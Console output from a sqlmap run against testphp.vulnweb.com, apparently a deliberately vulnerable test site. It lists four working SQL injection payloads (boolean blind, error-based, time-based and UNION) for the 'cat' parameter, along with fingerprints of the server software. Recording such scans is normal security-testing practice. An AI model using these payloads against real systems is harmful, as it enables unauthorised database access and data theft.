        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.3.13#dev}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:54:03 /2024-04-03/

[16:54:04] [INFO] resuming back-end DBMS 'mysql' 
[16:54:04] [INFO] testing connection to the target URL
[16:54:04] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7404=7404

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=1 AND GTID_SUBSET(CONCAT(0x71787a6271,(SELECT (ELT(3690=3690,1))),0x71717a7171),3690)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=1 AND (SELECT 9073 FROM (SELECT(SLEEP(5)))fhhG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a6271,0x4f5065674b6556585375664b4c676e634d71466f5246726b67597a4779796f46764e686c5871714e,0x71717a7171),NULL,NULL-- -
---
[16:54:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[16:54:04] [INFO] fetched data logged to text files under 'C:\Users\¿Ãø‰«—\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 16:54:04 /2024-04-03/

